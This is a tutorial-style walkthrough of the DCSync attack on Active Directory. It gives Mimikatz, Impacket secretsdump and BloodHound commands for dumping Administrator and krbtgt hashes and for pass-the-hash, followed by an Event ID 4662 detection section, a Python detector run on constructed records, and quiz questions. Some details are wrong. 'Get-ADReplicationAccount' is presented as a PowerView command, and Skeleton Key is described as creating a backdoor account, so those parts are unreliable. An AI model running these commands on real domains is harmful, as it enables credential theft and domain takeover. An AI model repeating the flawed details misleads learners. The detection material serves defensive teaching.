What is a DCSync Attack?
DCSync is a post-exploitation attack in which an attacker impersonates a Domain Controller (DC) and uses directory replication privileges to request password hashes from Active Directory (AD).
Why is DCSync Dangerous?
● Allows stealing NTLM hashes and Kerberos (AES) keys from AD.
● Can extract the password hashes of Domain Admins and of the KRBTGT account.
● Enables attackers to perform Golden Ticket and Pass-the-Hash (PtH) attacks.
● Requires no code execution on the Domain Controller; the replication request can be made remotely.
________________________________________
How Does a DCSync Attack Work? (Step-by-Step)
Step 1: Attacker Gains Domain Replication Rights
● DCSync requires administrative privileges or replication permissions.
● Typically, attackers compromise a Domain Admin, Enterprise Admin, or accounts with DS-Replication rights.
Check If an Account Has Replication Rights (PowerView)
Get-ADReplicationAccount -Domain example.com
Finds accounts with DCSync privileges.
________________________________________
Step 2: Use Mimikatz to Request Hashes from AD
● The attacker impersonates a Domain Controller and requests NTLM hashes from AD.
● The LSA replication API responds with hashed credentials.
Mimikatz Command to Perform DCSync Attack
mimikatz.exe
lsadump::dcsync /domain:example.com /user:Administrator
Extracts the NTLM hash of the Administrator account.
Extract KRBTGT Account Hash (For Golden Ticket Attack)
mimikatz.exe
lsadump::dcsync /domain:example.com /user:krbtgt
Steals the hash of the krbtgt account, the account that signs Kerberos Ticket Granting Tickets (TGTs).
________________________________________
Step 3: Use the Stolen Hashes for Further Attacks
After getting NTLM hashes, the attacker can:
● Perform Pass-the-Hash (PtH) to authenticate as the stolen user.
● Perform a Golden Ticket attack using the KRBTGT hash.
● Perform a Skeleton Key attack to create a backdoor account.
Use Stolen Hash for Pass-the-Hash Attack
mimikatz.exe
sekurlsa::pth /user:Administrator /domain:example.com /ntlm: /run:powershell.exe
Logs in as Administrator using the NTLM hash instead of the password.
________________________________________
Tools Used for DCSync Attacks
Tool                      | Usage
--------------------------+-------------------------------------------
Mimikatz                  | Perform DCSync and extract NTLM hashes
PowerView                 | Find accounts with replication permissions
Impacket (secretsdump.py) | Extract AD password hashes remotely
BloodHound                | Visualize replication permissions in AD
________________________________________
Example Commands for Each Tool
1. Check Replication Privileges with PowerView
Get-ADReplicationAccount -Domain example.com
Lists accounts that can run DCSync.
________________________________________
2. Perform DCSync Attack with Mimikatz
lsadump::dcsync /domain:example.com /user:Administrator
Steals Administrator’s NTLM hash.
________________________________________
3. Extract Password Hashes Remotely with Impacket (Linux)
python3 secretsdump.py example.com/Administrator@DC_IP -hashes :
Steals hashes from a remote Domain Controller.
________________________________________
4. Visualize AD Replication Permissions with BloodHound
Invoke-BloodHound -CollectionMethod ACL,DCOnly -OutputDirectory C:\Temp
Finds accounts that have replication rights.
________________________________________
How to Detect & Prevent DCSync Attacks?
Detection (Blue Team)
● Monitor Event ID 4662 for directory replication requests.
● Forward these events to a SIEM and alert on them.
Prevention (Security Hardening)
● Restrict replication rights to the accounts that genuinely need them.
________________________________________
Summary
● DCSync allows attackers to steal password hashes by impersonating a Domain Controller.
● Requires admin or replication privileges.
● Defenses include monitoring Event ID 4662, restricting replication rights, and using SIEM alerts.
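The summary points to Event ID 4662 as the detection signal. As an added example that is not part of the original page, the Python below scans constructed 4662-style records and flags replication rights used by a principal that is not a known Domain Controller; the simplified record format, the DC allow-list and the sample account names are assumptions, while the replication-right GUIDs are the real Active Directory values.

```python
import re

# Control-access right GUIDs seen in the Properties field of Event ID 4662 (real AD values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Computer accounts of the legitimate Domain Controllers (assumed for this example).
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

def parse_event(line):
    """Turn one 'Key=Value; Key=Value' record into a dict."""
    return dict(kv.strip().split("=", 1) for kv in line.split(";") if "=" in kv)

def detect_dcsync(events):
    """Flag successful 4662 events where a non-DC principal used replication rights."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4662" or ev.get("Keywords") != "Audit Success":
            continue
        guids = {g.lower() for g in GUID_RE.findall(ev.get("Properties", ""))}
        rights = sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)
        # Only Get-Changes-All returns password secrets; plain Get-Changes alone is benign.
        if "DS-Replication-Get-Changes-All" not in rights:
            continue
        subject = ev.get("SubjectUserName", "")
        if subject in KNOWN_DC_ACCOUNTS:
            continue  # DC-to-DC replication is expected and noisy
        alerts.append({"user": subject, "domain": ev.get("SubjectDomainName", ""), "rights": rights})
    return alerts

def scan(lines):
    return detect_dcsync(parse_event(line) for line in lines)

# Constructed sample records (not real logs) in the simplified format parse_event expects.
SAMPLE_EVENTS = [
    "EventID=4662; Keywords=Audit Success; SubjectUserName=DC02$; SubjectDomainName=EXAMPLE; "
    "Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; Keywords=Audit Success; SubjectUserName=jdoe; SubjectDomainName=EXAMPLE; "
    "Properties=%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4662; Keywords=Audit Success; SubjectUserName=svc_backup; SubjectDomainName=EXAMPLE; "
    "Properties=%%7688 {deadbeef-0000-4000-8000-000000000001}",  # constructed, not a replication right
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"DCSync suspect: {a['user']}@{a['domain']} used {', '.join(a['rights'])}")
```

In production the allow-list should be built from the domain's actual DC computer accounts, and any Azure AD Connect or backup service account that legitimately holds Get-Changes-All needs an explicit, reviewed exception rather than a blanket filter on names ending in "$".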
Question 1.
What does DCSync stand for?
Question 2.
Which permissions are needed to perform a DCSync attack?
Question 3.
Which tool is used to perform a DCSync attack?
Question 4.
Which account is crucial for a Golden Ticket attack?
Question 5.
What kind of account permissions are required for DCSync?
Question 6.
Which tool helps to identify accounts with replication rights in Active Directory?
Question 7.
Which command in Mimikatz is used to perform a DCSync attack?
Question 8.
What kind of hash is extracted in a DCSync attack?
Question 9.
Which additional tool can be used to extract AD hashes remotely?
Question 10.
Which tool visualizes replication permissions in Active Directory?
Question 11.
Which command can check accounts with replication rights using PowerView?
Question 12.
What type of attack can be performed after extracting a KRBTGT hash?
Question 13.
Which event ID should be monitored to detect DCSync attacks?
Question 14.
Which attack can be performed using the NTLM hashes stolen in a DCSync attack?
Question 15.
Which solution can be used to prevent privilege escalation and DCSync attacks?